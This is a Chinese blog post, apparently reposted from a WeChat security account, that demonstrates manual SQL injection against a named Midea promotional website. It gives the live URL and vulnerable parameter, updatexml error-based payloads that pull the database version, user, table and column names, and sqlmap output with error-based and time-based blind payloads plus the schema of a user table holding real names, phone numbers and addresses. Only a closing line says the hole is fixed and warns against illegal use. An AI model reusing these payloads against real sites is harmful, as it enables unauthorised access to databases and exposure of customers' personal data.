美的某站sql手工注入案例

http://act.midea.com/kt30year/site/action.php?act=like&class=' 输入个' 出现报错了

开始注入，今天掩饰手工注入，让你了解sql注入的具体怎么注入，暂时不再做工具党。。

我用updatexml 报错模式注入

http://act.midea.com/kt30year/site/action.php?act=like&class=%27or%20updatexml(1,concat(0x7e,version(),user(),database()),1)or%27

XPATH syntax error: '~kt30year'

猜数据库用户,数据库版本，数据库名

http://act.midea.com/kt30year/site/action.php?act=like&class='or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)or'

XPATH syntax error: '~hy_draw'

猜当前数据库表名

http://act.midea.com/kt30year/site/action.php?act=like&class=%27or%20updatexml(3,concat(0x7e,(SELECT%20concat(column_name)%20FROM%20information_schema.columns%20WHERE%20table_name=0x7573725F67656E6572616C%20limit%200,1)),4)or%27

XPATH syntax error: '~id'

这个是猜解表的列名

以下是我用sqlmap注入的POC：

可以分析下：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: act=like&class=' AND (SELECT 4469 FROM(SELECT COUNT(*),CONCAT(0x717
8787671,(SELECT (ELT(4469=4469,1))),0x7178626a71,FLOOR(RAND(0)*2))x FROM INFORMA
TION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ynoa'='ynoa
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]
',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARAC
TER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: act=like&class=' OR SLEEP(10) AND 'qTrY'='qTrY
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:57:35] [INFO] testing MySQL
[23:57:35] [DEBUG] performed 0 queries in 0.01 seconds
[23:57:35] [INFO] confirming MySQL
[23:57:35] [DEBUG] performed 0 queries in 0.00 seconds
[23:57:35] [DEBUG] performed 0 queries in 0.00 seconds
[23:57:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[23:57:35] [INFO] fetching current user
[23:57:35] [INFO] resumed: kt30year@localhost
[23:57:35] [DEBUG] performed 0 queries in 0.00 seconds
current user:    'kt30year@localhost'

available databases [3]:
[*] information_schema
[*] kt30year
[*] test

Database: kt30year
Table: usr_general
[18 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| address        | varchar(255)        |
| award          | tinyint(3) unsigned |
| id             | int(11) unsigned    |
| logintime      | datetime            |
| phone          | varchar(50)         |
| realname       | varchar(50)         |
| regtime        | datetime            |
| snsavatarlarge | varchar(200)        |
| snsfollowernum | int(15)             |
| snsfriendsnum  | int(15)             |
| snsgender      | varchar(4)          |
| snsid          | int(4)              |
| snslocation    | varchar(30)         |
| snsname        | varchar(30)         |
| snsnick        | varchar(30)         |
| snsstatusesnum | int(15)             |
| snsuid         | varchar(100)        |
| snsurl         | varchar(200)        |
+----------------+---------------------+

Database: kt30year
Table: hy_home
[3 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| value  | varchar(100)     |
| id     | int(10) unsigned |
| name   | varchar(100)     |
+--------+------------------+

改漏洞已经修复，请勿用于非法用途，谢谢~~

本文始发于微信公众号（飓风网络安全）：美的某站sql手工注入案例